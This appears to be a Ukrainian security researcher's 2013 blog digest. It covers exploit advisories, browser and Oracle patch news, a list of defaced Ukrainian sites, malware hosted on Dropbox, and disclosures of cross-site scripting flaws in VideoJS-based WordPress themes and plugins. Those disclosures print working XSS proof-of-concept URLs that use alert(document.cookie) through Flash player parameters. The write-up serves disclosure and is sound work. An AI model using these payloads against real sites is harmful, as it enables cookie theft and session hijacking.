Websecurity - Веб безпека

В даній добірці експлоіти в веб додатках:

• D-Link DSL-320B - Multiple Vulnerabilities (деталі)
• Cisco Linksys E4200 Firmware - XSS/LFI Vulnerabilities (деталі)
• Flightgear 2.0 / 2.4 Format String Vulnerability (деталі)
• SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution (деталі)
• Huawei SNMPv3 Buffer Overflow Vulnerability (деталі)

У травні, 15.05.2013, вийшов Mozilla Firefox 21. Нова версія браузера вийшла через півтора місяця після виходу Firefox 20.

Mozilla офіційно випустила реліз веб-браузера Firefox 21, а також мобільну версію Firefox 21 для платформи Android. Відповідно до шеститижневого циклу розробки, реліз Firefox 22 намічений на 25 червня, а Firefox 23 на 6 серпня. Також був випущений Seamonkey 2.18.

Одночасно з Firefox 21 випущені коригувальні релізи гілок із тривалим терміном підтримки - Firefox 17.0.6 і Thunderbird 17.0.6.

Окремо варто відзначити, що крім нововведень і виправлення помилок у Firefox 21.0 усунуто 8 уразливостей, серед яких 4 позначені як критичні, що можуть привести до виконання коду зловмисника при відкритті спеціально оформлених сторінок. Причому ця кількість - це саме патчі (Mozilla типово виправляє по декілька дір за один патч).

• Релиз Firefox 21 (деталі)

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://dei.gov.ua (хакером Dr.SHA6H) - 30.12.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://zvenrada.gov.ua (хакером ghost-dz) - 26.02.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://baklykoff.com (хакером ABO-SHOSHAH) - 13.04.2013, зараз сайт вже виправлений адмінами
• http://agrosmak.net (хакером ABO-SHOSHAH) - 13.04.2013, зараз сайт вже виправлений адмінами
• http://www.trideneli.ua (хакером Hacker603) - причому спочатку сайт 30.04.2013 був взломаний Hacker603, 02.05.2013 він був взломаний Shr3if, а 08.05.2013 він був взломаний 3alee GhOst WarRior. Схоже, що сайт постійно хакається, як і деякі інші сайти в Уанеті

В даній добірці уразливості в веб додатках:

• Nagios XI Network Monitor Blind SQL Injection (деталі)
• icinga security update (деталі)
• Nagios XI Network Monitor OS Command Injection (деталі)
• Path Traversal in AWS XMS (деталі)
• IBM System Director Remote System Level Exploit (CVE-2009-0880 extended zeroday) (деталі)
• MailOrderWorks v5.907 - Multiple Web Vulnerabilities (деталі)
• HP Integrated Lights-Out iLO3 and iLO4, Remote Disclosure of Information (деталі)
• Update Spoofing Vulnerability in mRemote 1.50 (деталі)
• MPC (Media Player Classic) WebServer Multiple Vulnerabilities (деталі)
• Update Spoofing Vulnerability in Royal TS 2.1.5 (деталі)

У лютому, 07.02.2013, я виявив Cross-Site Scripting та Full path disclosure уразливості в темах для WordPress, що містять VideoJS. Раніше я писав про уразливості в VideoJS.

Це дуже поширена флешка, що знаходиться на сотнях тисяч веб сайтів і яка використовується в багатьох веб додатках. При стандартному пошуку VideoJS через Гугл дорки виводиться 446000 сайтів, а при пошуку по плагінам для WordPress можна знайти 171000 сайтів з цією флешкою.

Цей плеєр міститься в багатьох темах (шаблонах) для WordPress. Серед них Covert VideoPress, Photolio, Source, Smartstart та Crius. Та існують інші уразливі теми для WordPress з video-js.swf (судячи з гугл дорка). Розробники VideoJS випустили оновлення свого плеєра і всім розробникам веб додатків з VideoJS потрібно його оновити в своїх додатках.

Cross-Site Scripting (WASC-08):

Існують теми з багатьма флеш медіа плеєрами: окрім VideoJS вони мають jPlayer і JW Player. І такі теми мають усі XSS та Content Spoofing уразливості, які мають jPlayer і JW Player.

Covert VideoPress:

http://site/wp-content/themes/covertvideopress/assets/video-js.swf?readyFunction=alert(document.cookie)

Photolio:

http://site/wp-content/themes/photolio/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/photolio/js/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/photolio/js/jwplayer/player.swf?playerready=alert(document.cookie)
http://site/wp-content/themes/photolio/js/jwplayer/video-js.swf?readyFunction=alert(document.cookie)

Source:

http://site/wp-content/themes/source/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/source/js/jplayer/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/source/js/video/video-js.swf?readyFunction=alert(document.cookie)

Smartstart:

http://site/wp-content/themes/smartstart/js/video-js.swf?readyFunction=alert(document.cookie)

Crius:

http://site/wp-content/themes/crius/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/crius/js/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/crius/js/player.swf?playerready=alert(document.cookie)
http://site/wp-content/themes/crius/js/video-js.swf?readyFunction=alert(document.cookie)

Full path disclosure (WASC-13):

Всі зазначені теми мають FPD уразливості в php-файлах (в index.php та інших), що типово для WP тем.

http://site/wp-content/themes/covertvideopress/

http://site/wp-content/themes/photolio/

http://site/wp-content/themes/source/

http://site/wp-content/themes/smartstart/

http://site/wp-content/themes/crius/

Вразливі всі версії наступних веб додатків: Covert VideoPress, Photolio, Source, Smartstart та Crius.

Вразливі веб додатки, що використовують VideoJS Flash Component 3.0.2 і попередні версії. Версія VideoJS Flash Component 3.0.2 не вразлива до згаданої XSS дірки, але вразлива до XSS через JS калбеки (подібно до JW Player). А також є обхідні методи, що працюють в останній версії, але розробники не виправили їх через їхній невеликий вплив. Тому розробникам веб додатків з VideoJS потрібно оновити його до останньої версії.

В попередні роки я неодноразово писав про інфекцію на відомих сайтах. І зараз розповім про інфікований dropbox.com. Якщо скорочувачі адрес, такі як TinyURL, та соціальні мережі, такі як ВКонтакте, вже давно використовуються для поширення шкідливого коду, то файлообмінники також можуть використовуватися для цього. І нещодавно я виявив подібну ситуацію на сервісі обміну файлами та синхронізації файлів Dropbox.

Наприклад, на tinyurl.com зараз розміщено багато шкідливого ПЗ, так само як це було в 2010 році. Останнього разу підозрілий вміст на цьому сайті був виявлений сьогодні. Шкідливий код може розміщуватися як на сторінках самого сервісу (про відповідні уразливості я писав раніше), так і на тих сайтах, куди він редиректить (бо саме це є призначанням сервісу і цей функціонал використовується для атак на користувачів).

У випадку Dropbox атака відбувається через розміщення шкідливих файлів на серверах сервісу. За даними Google, підозрілий вміст на dropbox.com був виявлений сьогодні. Зафіксовано таке зловмисне програмне забезпечення: 3217 троянів, 2009 вірусів та 1826 експлоітів. За попередні 90 днів на цьому сайті розміщувалося зловмисне програмне забезпечення. Ним заражено 42 домени та він був проміжною ланкою в зараженні 13 інших сайтів.

Як я виявив, шкідливе ПЗ розміщене на доменах dl.dropbox.com і dl.dropboxusercontent.com (маловірогідно, що malware є на основному домені dropbox.com, бо доступ до файлів розміщених на Dropbox відбувається саме на цих доменах). Це статистика для першого домену, а для dl.dropboxusercontent.com маємо наступну статистику. Зафіксовано таке зловмисне програмне забезпечення: 974 троянів, 790 експлоітів та 370 вірусів. За попередні 90 днів ним заражено 424 домени та він був проміжною ланкою в зараженні 11 інших сайтів.

Так що окрім дірок Dropbox, що торік призвели до взлому сервісу, він ще використовується для поширення шкідливого ПЗ. Тому власникам сервісу є куди покращувати його безпеку.

24.04.2013

Виявлені численні уразливості безпеки в продуктах Oracle, Sun, People Soft і MySQL.

Уразливі продукти: Oracle 10g, Oracle 11g, MySQL 5.1, 5.5 і 5.6, Oracle E-Business Suite 11i, JRockit 28.2, WebLogic Server 12.1, PeopleSoft HRMS 9.1, PeopleSoft PeopleTools 8.53 та інші продукти Oracle.

128 різних уразливостей у різних додатках виправлено в щоквартальному оновленні.

• Oracle Critical Patch Update Advisory - April 2013 (деталі)

15.05.2013

Додаткова інформація.

• Oracle Retail Invoice Manager SQL Injection (деталі)
• Oracle Retail Integration Bus Manager Directory Traversal (деталі)
• Oracle 11g TNS listener remote Invalid Pointer Read (pre-auth) (деталі)
• Oracle 11g TNS listener remote Null Pointer Dereference (pre-auth) (деталі)

В даній добірці експлоіти в веб додатках:

• Cisco Linksys E1200 / N300 Cross Site Scripting Vulnerability (деталі)
• D-Link DNS-323 - Multiple Vulnerabilities (деталі)
• MoinMelt Arbitrary Command Execution Exploit (деталі)
• ColdFusion 9 / 10 Remote Root Exploit (деталі)
• Syslog Watcher Pro 2.8.0.812 - (Date Parameter) - XSS Vulnerability (деталі)

У лютому, 07.02.2013, я виявив Cross-Site Scripting уразливості в плагінах для WordPress, що містять VideoJS. Раніше я писав про уразливості в VideoJS.

Це дуже поширена флешка, що знаходиться на сотнях тисяч веб сайтів і яка використовується в багатьох веб додатках. При стандартному пошуку VideoJS через Гугл дорки виводиться 446000 сайтів, а при пошуку по плагінам для WordPress можна знайти 178000 сайтів з цією флешкою.

На додачу до плагіна VideoJS - HTML5 Video Player for WordPress, про якого я писав раніше, ось нові плагіни з цим плеєром. Серед них Video Embed & Thumbnail Generator, External “Video for Everybody”, 1player, S3 Video і EasySqueezePage. Та існують інші уразливі плагіни для WordPress з video-js.swf (судячи з гугл дорка). Розробники VideoJS випустили оновлення свого плеєра і всім розробникам веб додатків з VideoJS потрібно його оновити в своїх додатках.

Cross-Site Scripting (WASC-08):

Video Embed & Thumbnail Generator:

http://site/wp-content/plugins/video-embed-thumbnail-generator/video-js/video-js.swf?readyFunction=alert(document.cookie)

External “Video for Everybody”:

http://site/wp-content/plugins/external-video-for-everybody/video-js/video-js.swf?readyFunction=alert(document.cookie)

1player:

http://site/wp-content/plugins/1player/players/video-js/video-js.swf?readyFunction=alert(document.cookie)

S3 Video:

http://site/wp-content/plugins/s3-video/misc/video-js.swf?readyFunction=alert(document.cookie)

EasySqueezePage:

http://site/wp-content/plugins/EasySqueezePage/videojs/video-js.swf?readyFunction=alert(document.cookie)

Вразливі наступні веб додатки: Video Embed & Thumbnail Generator 4.0.3 і попередні версії, External “Video for Everybody” 2.0 і попередні версії, 1player 1.2 і попередні версії, S3 Video 0.97 і попередні версії, EasySqueezePage (всі версії).

Вразливі веб додатки, що використовують VideoJS Flash Component 3.0.2 і попередні версії. Версія VideoJS Flash Component 3.0.2 не вразлива до згаданої XSS дірки, але вразлива до XSS через JS калбеки (подібно до JW Player). А також є обхідні методи, що працюють в останній версії, але розробники не виправили їх через їхній невеликий вплив. Тому розробникам веб додатків з VideoJS потрібно оновити його до останньої версії.

Виявлені уразливості безпеки в Apache Tomcat.

Уразливі версії: Apache Tomcat 6.0, Tomcat 7.0.

DoS, перехоплення сеансу, витік інформації.

• Request mix-up if AsyncListener method throws RuntimeException (деталі)
• Session fixation with FORM authenticator (деталі)
• Chunked transfer encoding extension size is not limited (деталі)